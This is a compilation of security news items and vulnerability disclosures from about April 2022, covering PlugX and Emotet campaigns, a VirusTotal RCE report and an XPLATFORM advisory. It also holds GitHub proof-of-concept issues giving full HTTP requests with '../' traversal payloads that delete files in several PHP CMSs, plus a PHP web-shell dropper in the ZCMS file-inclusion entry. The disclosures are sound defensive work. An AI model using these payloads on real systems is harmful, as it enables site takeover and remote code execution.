A China-linked government-sponsored threat actor has been observed targeting Russian speakers with an updated version of a remote access trojan called PlugX.
Secureworks attributed the attempted intrusions to a threat actor it tracks as Bronze President, and by the wider cybersecurity community under the monikers Mustang Panda, TA416, HoneyMyte, RedDelta, and PKPLUG.
"The war in Ukraine has

![PlugX Malware](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj5xuLJaTB-qBvEp10kBoQBs184MuorHdkHDoJK2GNomCTwuAZTUlvNPt23zXOEMyNE0npV6NPejnz2nh4-Q1qMqlHh45vlNet1SwMt4uucTmdBX_fGmYICIdgwpC8qILbPYGPa0fWJ7rmDb5OpNFMyV6yR4UITUXBDc6QJVoL1SNElO54eTYL2Bbv6/s728-e1000/china-russia.gif "PlugX Malware")

A China-linked government-sponsored threat actor has been observed targeting Russian speakers with an updated version of a remote access trojan called PlugX.

Secureworks attributed the attempted intrusions to a threat actor it tracks as Bronze President, and by the wider cybersecurity community under the monikers Mustang Panda, TA416, HoneyMyte, RedDelta, and PKPLUG.

"The war in Ukraine has prompted many countries to deploy their cyber capabilities to gain insight about global events, political machinations, and motivations," the cybersecurity firm said in a report shared with The Hacker News. "This desire for situational awareness often extends to collecting intelligence from allies and 'friends.'"

Bronze President, active since at least July 2018, has a history of conducting espionage operations by leveraging custom and publicly available tools to compromise, maintain long-term access, and collect data from targets of interest.

![CyberSecurity](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAD6AQMAAAAho+iwAAAAA1BMVEXm5+i1+56pAAAAH0lEQVQYGe3AAQ0AAADCIPuntscHAwAAAAAAAAAAIOQmFgAB/YLDRAAAAABJRU5ErkJggg==)

Chief among its tools is PlugX, a Windows backdoor that enables threat actors to execute a variety of commands on infected systems and which has been employed by several Chinese state-sponsored actors over the years.

The latest findings from Secureworks suggest an expansion of the same campaign previously detailed by Proofpoint and ESET last month, which has involved the use of a new variant of PlugX codenamed Hodur, so labeled owing to its overlaps with another version called THOR that emerged on the scene in July 2021.

![PlugX Malware](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjPISpeAfa4WL5oqadRdNrgThQ-LU9yqEyGnwIy1EzaerbYW5zrl1tGgazr6QIT40wbxIKSUn7F5z7HcJbqZcj2XCvV181YArCCbgL8TxDKH4lNqC00Cv_fJSN6p4AekErsps_3ZPT5ovcC2YBf5bngyyrpHiTsPtK2_uzORzluzuZiTHubtNFST2zR/s728-e1000/data.jpg "PlugX Malware")

The attack chain commences with a malicious executable named "Blagoveshchensk - Blagoveshchensk Border Detachment.exe" that masquerades as a seemingly legitimate document with a PDF icon, which, when opened, leads to the deployment of an encrypted PlugX payload from a remote server.

"Blagoveshchensk is a Russian city close to the China border and is home to the 56th Blagoveshchenskiy Red Banner Border Guard Detachment," the researchers said. "This connection suggests that the filename was chosen to target officials or military personnel familiar with the region."

The fact that Russian officials may have been the target of the March 2022 campaign indicates that the threat actor is evolving its tactics in response to the political situation in Europe and the war in Ukraine.

![CyberSecurity](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj6zHdXd3qpCksF0nkMkrjsOzaw-cxZGPHWoTEp9y7VPIeyPBFGsmIyIX8NTkqI1IDqnIXYnsZuIh4rc9f8TNUn7ndAZqtXc-t58X2oueTaL4Ijb4hgH-b183QvQ0ienXIipuOsqeLP5b8I2prKmp0RWvdZQgnKehVRKbqRQpin1JgfwlZeE_IB4EmesQ/s1600/crowdsec-728.jpg)

"Targeting Russian-speaking users and European entities suggests that the threat actors have received updated tasking that reflects the changing intelligence collection requirements of the \[People's Republic of China\]," the researchers said.

The findings come weeks after another China-based nation-state group known as Nomad Panda (aka RedFoxtrot) was linked with medium confidence to attacks against defense and telecom sectors in South Asia by leveraging yet another version of PlugX dubbed Talisman.

"PlugX has been associated with various Chinese actors in recent years," Trellix noted last month. "This fact raises the question if the malware's code base is shared among different Chinese state-backed groups."

"On the other hand, the alleged leak of the PlugX v1 builder, as reported by Airbus in 2015, indicates that not all occurrences of PlugX are necessarily tied to Chinese actors," the cybersecurity company added.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Chinese Hackers Targeting Russian Military Personnel with Updated PlugX Malware 

Emotet is back with a new spam campaign. And it's now spreading itself as a shortcut link file pretending to be Word document.
The post Emotet fixes bug in code, resumes spam campaign appeared first on Malwarebytes Labs.

![Emotet fixes bug in code, resumes spam campaign](https://blog.malwarebytes.com/wp-content/uploads/2022/04/GettyImages-1277291140-900x506.jpg)

Posted: April 27, 2022 by

Emotet threat actors resumed their email spam campaign on Monday after stopping it late last week to fix a bug.

The bug—a flaw in how Emotet is installed onto a system after a victim opens a malicious email attachment—forced the actors to prematurely halt their campaign.

![](https://blog.malwarebytes.com/wp-content/uploads/2022/04/FQ-puUmWUAERnF2-600x392.jpeg)

_Sample email of an Emotet spam containing a defective attachment.  
(Source: @malware\_traffic)_

Emotet is spammed around in emails claiming to contain invoices, forms, or payment details. The attachment is a password-protected ZIP file with a shortcut link file (has the .LNK extension) inside pretending to be a Word document file.

Normally, once users double-click the file, Emotet is loaded into memory, steals email addresses to use in future campaigns, and drops a payload, usually another malware like ransomware or Cobalt Strike. However, the bug happened immediately after the attachment was clicked.

You see, double-clicking the file sets off a chain. A command looks for a string hidden in the .LNK file containing code written in Visual Basic. This code is then appended to a new VBS file before executing that file. But, the shortcut file a command statically calls to does not match the actual name of the attached shortcut file. For example, the command code calls for “Password2.doc.lnk”, but the attached file itself is named “INVOICE 2022-04-22\_1033, USA.doc”. This error breaks the infection chain.

Cryptolaemus (@Cryptolaemus1) has provided a more technical explanation in this Twitter thread:

> #emotet Update – As of the last few hours Ivan is running some tests on E4 to try to bypass detection by appending a VBS at the end of an LNK file in a zip. The LNK when launched will find a string in itself and then copy the remainder from that string after to a VBS file. 1/x https://t.co/pEcOWdbfOa
> 
> — Cryptolaemus (@Cryptolaemus1) April 22, 2022

Emotet’s current use of .LNK files as attachments is a tried-and-tested tactic that can bypass antivirus detection and Mark-of-the-Web (MOTW) “marking.” Mark of the Web is a Windows feature that determines the origin of a file downloaded from the Internet.

Our Threat Intelligence Team has seen APT threat actors use .LNK files in their attack campaigns (the Higaisa APT comes to mind). It’s no surprise that other cybercriminal groups have adopted this. Proponents of Emotet and IcedID were just some of them.

Emotet has been revolutionizing its way of reaching victims during its years of activity. Historically, it was spread via malicious Windows App Installer packages and malformed Word documents. Emotet is a sophisticated and versatile Trojan, which has been used by other criminal groups to drop their own malware, causing multiple system infections. Some of the files it drops are QBot, QakBot, TrickBot, and Mimikatz (a legitimate tool used to steal credentials).

BleepingComputer shared a list of attachment names the new Emotet email spam campaign is using, courtesy of Cofense, a security company specializing in email security:

*   ACH form.zip
*   ACH payment info.zip
*   BANK TRANSFER COPY.zip
*   Electronic form.zip
*   form.zip
*   Form.zip
*   Form – Apr 25, 2022.zip
*   Payment Status.zip
*   PO 04252022.zip
*   Transaction.zip

If you have received any emails bearing attachments with the above names, it would be wise to delete them immediately to prevent the risk of accidentally opening the attachment.

Stay safe out there!

**RELATED ARTICLES**

Emotet fixes bug in code, resumes spam campaign

Verydows v2.0 was discovered to contain an arbitrary file deletion vulnerability via \backend\file_controller.php.

Vulnerability file: \\protected\\controller\\backend\\file\_controller.php  
It can be seen that the deleted file or directory is received through the path parameter, and is directly deleted without security filtering, so we can use this vulnerability to delete any file  
![image](https://user-images.githubusercontent.com/90141086/159689762-0e63e61c-7234-4a9e-884c-5f7cd4bf89bb.png)

Vulnerability to reproduce:

1.  First log in to the background to get cookies。
2.  Here I delete the installed.lock file to verify the existence of the vulnerability，construct the packet as follows:

POST /index.php?m=backend&c=file&a=delete HTTP/1.1  
Host: www.xxx.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,_/_;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: http://www.xiaodi.com/index.php?m=backend&c=file&a=index  
Cookie: VDSSKEY=d6123bedd1b697a783c9da6f0b92254c  
DNT: 1  
Connection: close  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 32

path\[\]=../install/installed.lock

3、Click Send Packet,you can see that the file was deleted successfully  
![image](https://user-images.githubusercontent.com/90141086/159695536-d0b07eb4-9c48-4bc7-a158-0677406160fc.png)

4、It can be seen that when the installed.lock file exists, when visiting http://x.x.x/install, the page will directly jump to the front home page  
![image](https://user-images.githubusercontent.com/90141086/159697683-b812ea24-5a46-4d95-83a0-b239211fb8a9.png)

Therefore, when we delete the installed.lock file and visit http://x.x.x/install again, we will come to the installation wizard page  
![image](https://user-images.githubusercontent.com/90141086/159696798-eee9f50f-7051-4356-82c1-ef2ddb1621a1.png)

Repair suggestion:

1.  Filter ../ or ..\\ in the file variable
2.  Limit the scope of deleted files or directories

CVE-2022-28058: Arbitrary file deletion vulnerability exists · Issue #20 · Verytops/verydows

Verydows v2.0 was discovered to contain an arbitrary file deletion vulnerability via \backend\database_controller.php.

Vulnerable file: \\protected\\controller\\backend\\database\_controller.php  
It can be clearly seen that $file is not security filtered  
Vulnerable code：  
....................................................  
![image](https://user-images.githubusercontent.com/90141086/159718097-6dbba910-c999-4758-b2ad-3035297b0de5.png)

..................................................

Vulnerability to reproduce:  
1、First log in to the background to get the cookie

2、Here I delete the installed.lock file to verify the existence of the vulnerability, the construction package is as follows:

POST /index.php?m=backend&c=database&a=restore&step=delete HTTP/1.1  
Host: www.xxx.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,_/_;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: http://www.xiaodi.com/index.php?m=backend&c=database&a=restore  
Cookie: VDSSKEY=d6123bedd1b697a783c9da6f0b92254c  
DNT: 1  
Connection: close  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 42

file%5B%5D=../../../install/installed.lock

3、Click to send the data package, you can see that the file was deleted successfully  
![image](https://user-images.githubusercontent.com/90141086/159714294-7881f591-14d7-4a4a-9ec1-2e7522e9003b.png)

4、It can be seen that when the installed.lock file exists, when visiting http://xxx/install, the page will directly jump to the front home page  
![image](https://user-images.githubusercontent.com/90141086/159714437-d584c580-4580-4ae3-89f7-821da525bc53.png)

So as long as we delete the installed.lock file, we can reinstall the system，When we delete the installed.lock file and visit http://x.x.x/install, we will enter the installation wizard page  
![image](https://user-images.githubusercontent.com/90141086/159715033-a1925083-2b2e-4e85-9374-7990f0612a83.png)

Repair suggestion:

1、Filter ../ or ..\\ in the file variable  
2、Limit the scope of deleted files or directories

CVE-2022-28059: Verydows Exists Arbitrary File Deletion Vulnerability · Issue #21 · Verytops/verydows

HongCMS 3.0.0 allows arbitrary file deletion via the component /admin/index.php/template/ajax?action=delete.

Vulnerability file: \\admin\\controllers\\template.php  
The vulnerability code is as follows:  
![image](https://user-images.githubusercontent.com/90141086/161013598-2b6334d7-6b8b-4382-b01d-e3bf9c87d79d.png)

Arbitrary file deletion vulnerability could lead to system reinstallation  
Vulnerability to reproduce:  
1、First log in to the background to get cookies

2、Part of the code in the /install/index.php file is as follows:  
the following code means that the system can be reinstalled as long as the /config/config.php file is deleted  
..................................................................  
![image](https://user-images.githubusercontent.com/90141086/161021721-bdbbd26f-19fc-4dcf-a58a-929aed9c0369.png)

..................................................................

3、Construct the packet that deletes the config.php file as follows:  
.......................................................................................................  
POST /admin/index.php/template/ajax?action=delete HTTP/1.1  
Host: www.xxx.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: application/json, text/javascript, _/_; q=0.01  
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Referer: http://www.xxx.com/admin/index.php/template?dir=Default/  
Content-Length: 30  
Cookie: w4Gy9uu6fQW3admin=60edcf231451d2f7493eb8dcfc46d32e  
DNT: 1  
Connection: close

dir=Default%2F&file=../../../config/config.php  
........................................................................................................

Repair suggestion:  
1、Filter ../ or ..\\ in file variables  
2、Only allow files in the specified directory to be deleted

CVE-2022-28523: There is an arbitrary file deletion vulnerability here: /admin/index.php/template/ajax?action=delete · Issue #17 · Neeke/HongCMS

GreenCMS v2.3.0603 was discovered to contain an arbitrary file deletion vulnerability via /index.php?m=admin&c=custom&a=plugindelhandle&plugin_name=.

Vulnerability file: \\Application\\Common\\Util\\File.class.php  
![image](https://user-images.githubusercontent.com/90141086/161521942-4a2e8198-04a3-4814-9657-e227e07773fd.png)

Vulnerability to reproduce:  
1、First log in to the background  
2、Visit url: http://www.xxx.com/index.php?m=admin&c=custom&a=plugin  
3、Here delete the 111 folder in the root directory，construct the packet as follows:  
.................................................  
GET /index.php?m=admin&c=custom&a=plugindelhandle&plugin\_name=../111 HTTP/1.1  
Host: www.xxx.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,_/_;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: http://www.xxx.com/index.php?m=admin&c=custom&a=plugin  
Cookie: PHPSESSID=jlmibkatfp939ds8pk3qpiv536; Hm\_lvt\_48659a4ab85f1bcebb11d3dd3ecb6760=1649066135; Hm\_lpvt\_48659a4ab85f1bcebb11d3dd3ecb6760=1649066212; greencms\_last\_visit\_page=aHR0cDovL3d3dy54aWFvZGkuY29tL2luZGV4LnBocD9tPWFkbWluJmM9Y3VzdG9tJmE9cGx1Z2lu  
DNT: 1  
Connection: close  
Upgrade-Insecure-Requests: 1  
.................................................

Repair suggestion:  
1、Filter ../ and ..\\  
2、Specify the range of files to delete

CVE-2022-28918: There is an arbitrary file deletion vulnerability here: /index.php?m=admin&c=custom&a=plugindelhandle&plugin_name= · Issue #116 · GreenCMS/GreenCMS

dhcms v20170919 was discovered to contain an arbitrary folder deletion vulnerability via /admin.php?r=admin/AdminBackup/del.

Vulnerability file: \\framework\\ext\\Util.php  
You can see that the following code does not filter ../ or ..\\, it just filters . or .., which will cause any folder to be deleted  
![image](https://user-images.githubusercontent.com/90141086/161227651-3b70d3c6-c3a3-4195-88dd-cdb483c5ef63.png)

Vulnerability to reproduce:  
1、Log in to the backend first  
2、Construct the packet as follows:  
.............................................  
POST /admin.php?r=admin/AdminBackup/del HTTP/1.1  
Host: www.xxx.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: application/json, text/javascript, _/_; q=0.01  
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Referer: http://www.xxx.com/admin.php?r=admin/AdminBackup/index  
Content-Length: 20  
Cookie: PHPSESSID=prukpjkatj61ivpcp5lh976ok4  
DNT: 1  
Connection: close

data=../111  
............................................  
You can see that the page shows that the file was deleted successfully  
![86Y4W@)_U2F 17DXTD5H2R](https://user-images.githubusercontent.com/90141086/161229545-d046cd5a-c4f9-49b4-8016-9ee9339786c0.png)

Repair suggestion:  
filter ../ or ..\\

CVE-2022-28527: There is an arbitrary folder deletion vulnerability here:/admin.php?r=admin/AdminBackup/del · Issue #5 · ShaoGongBra/dhcms

ZCMS v20170206 was discovered to contain a file inclusion vulnerability via index.php?m=home&c=home&a=sp_set_config.

Permalink

Cannot retrieve contributors at this time

There is a file inclusion vulnerability here: index.php?m=home&c=home&a=sp\_set\_config

Vulnerability file：\\Application\\Home\\Controller\\HomeController.class.php

The vulnerability code is as follows:

You can see that the incoming file is directly included here, and the file is not filtered

.....................................................

function sp\_set\_config($file,$config\_array){

if (is\_writable($file)) {

$config = require $file;

$config\_content = array\_merge($config, $config\_array);

file\_put\_contents($file, "<?php \\nreturn " . stripslashes(var\_export($config\_content, true)) . ";", LOCK\_EX);

}

.....................................................

Vulnerability to reproduce:

1、First create a 1.txt file in the root directory of the website，of course, this can be any file in the root directory of the website

2、The code in the 1.txt file is as follows:

<?php phpinfo();?> <?php fputs(fopen('shell.php','w'),'<?php @eval($\_POST\[cmd\]); ?>'); ?>

3、Visit url: http://www.xxx.com/index.php?m=home&c=home&a=sp\_set\_config ，use the post method to pass in $file and $config\_array

The poc is as follows:

.................................................................................................

POST /index.php?m=home&c=home&a=sp\_set\_config HTTP/1.1

Host: www.xiaodi.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

DNT: 1

Connection: close

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

Content-Length: 27

file=1.txt&config\_array=xxx

................................................................................................

4、You can see that shell.php is successfully generated in the root directory of the website

Repair suggestion:

1、Restrict incoming files to php suffix

2、Specifies the incoming filename

3、Detect and filter the content of incoming files

CVE-2022-28521: bug_report/zcms：php file inclusion at main · zhendezuile/bug_report

By Waqas
The vulnerability that existed for the last 8 months allowed attackers to weaponize the VirusTotal platform to achieve…
This is a post from HackRead.com Read the original post: Critical RCE Vulnerability Reported in Google’s VirusTotal

**The vulnerability that existed for the last 8 months allowed attackers to weaponize the VirusTotal platform to achieve remote code execution on an unpatched 3rd party sandboxing machine employing anti-virus engines.**

In January 2022, a report dubbed “VirusTotal Hacking” revealed how the platform can be used to access stolen login credentials and other sensitive files. Now, the IT security researchers at CySource have reported a method to abuse the VirusTotal malware scanning service to execute arbitrary commands and access multiple internal hosts remotely by using a remote code execution (RCE) vulnerability (CVE-2021-22204).

According to researchers, the vulnerability could allow attackers to weaponize the VirusTotal platform and achieve remote code execution on an unpatched 3rd party sandboxing machine employing anti-virus engines.

**How Could the Vulnerability be Exploited?**

Israeli security services provider CySource’s researchers Shai Alfasi and Marlon Fabiano da Silva embedded a payload in the DjVu file’s metadata for exploiting the vulnerability, identified in ExifTool open-source utility. This utility extracts Exchangeable Image File annotations, metadata, and tags.

Moreover, it can trigger another vulnerability to obtain remote code execution. This vulnerability is triggered by DjVu files and was identified by researcher William Bowling in 2021 in ExifTool 12.23. It was surprising that none of the VirusTotal anti-virus scanners could detect the CySource researchers’ Base64 encoded payload they included in the malicious DjVu file’s metadata.

> “Instead of ExifTool detecting the metadata of the file, it executes our payload.”
> 
> CySource

The researchers also got a reverse shell that allowed them to access over 50 internal network hosts with high privileges at Google and its other VirusTotal security vendor partners. Every time they uploaded a file with a new hash and a new payload, VirusTotal forwarded it to bots.

This indicates that apart from an RCE, the payload was forwarded by Google servers to the company’s internal network, partners, and customers as well. When researchers were able to invade the networks, they mapped out various services, including MySQL, Kubernetes container orchestration, Oracle databases, web applications, and Secure Shell (SSH).

**More Vulnerability News on Hackread.com**

1.  Hackers mining Monero on Microsoft SQL databases for last 2 years
2.  Hackers are using a 19-year-old WinRAR bug to install nasty malware
3.  12-Year-Old vulnerability in Windows Defender risked 1 billion devices
4.  Google, Microsoft and Oracle generated the most vulnerabilities in 2021
5.  Google Drive accounted for 50% of malicious Office document downloads

**Google Released Patch after Eight Months**

The vulnerability was disclosed to Google’s vulnerability reward program in April 2021, and the report was accepted in May 2021. However, the fix was dispatched in January 2022, after which CySource received the green signal to share details of the bug.

It is still unclear why Google took so long to fix this vulnerability. VirusTotal is a trusted service from Google’s subsidiary Chronicle, offering access to more than 70 different anti-virus scanning solutions from mainstream security vendors, including ESET, Kaspersky, and 360 Total Security. It is, therefore, quite shocking that a dangerous remote code execution vulnerability plagued this service for over eight months.

![](https://secure.gravatar.com/avatar/cf728b76a63b387b11edeafcb1b9b654?s=100&d=wavatar&r=g)

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Critical RCE Vulnerability Reported in Google’s VirusTotal

A path traversal vulnerability in XPLATFORM's runtime archive function could lead to arbitrary file creation. When the .xzip archive file is decompressed, an arbitrary file can be d in the parent path by using the path traversal pattern ‘..\’.

**Security Advisory**

 

CVE-2021-26629 | tobesoft XPLATFORM Path Traversal Vulnerability2022.04.26

□ Overview  
 o tobesoft Co.,Ltd released security update to address path traversal vulnerability in XPLATFORM.

Vulnerability

Vulnerability Type

Impact

Severity

CVSS Score

CVE ID

Path Traversal

arbitrary file creation

High

8.1

CVE-2021-26629

  
□ Description  
 o A path traversal vulnerability in XPLATFORM's runtime archive function could lead to arbitrary file creation.  
 o When the .xzip archive file is decompressed, an arbitrary file can be d in the parent path by using the path traversal pattern ‘..\\’.

□ Affected Product

Affected Product

Product

Version

Platform

XPLATFORM

prior of 9.2.2.280

Windows

  
□ Solution  
 o Update software over XPLATFORM 9.2.2.291 version or higher.

□ Reference  
 \[1\] https://www.tobesoft.com/product/Xplatform.do  
 \[2\] http://docs.tobesoft.com/admin\_guide\_xplatform\_ko#5f55812f84e589d

□ Etc  
 o Thanks to Jeongun Baek for reporting this vulnerability.

□ 작성 : 침해사고분석단 취약점분석팀

트위터 페이스북

Tag

#windows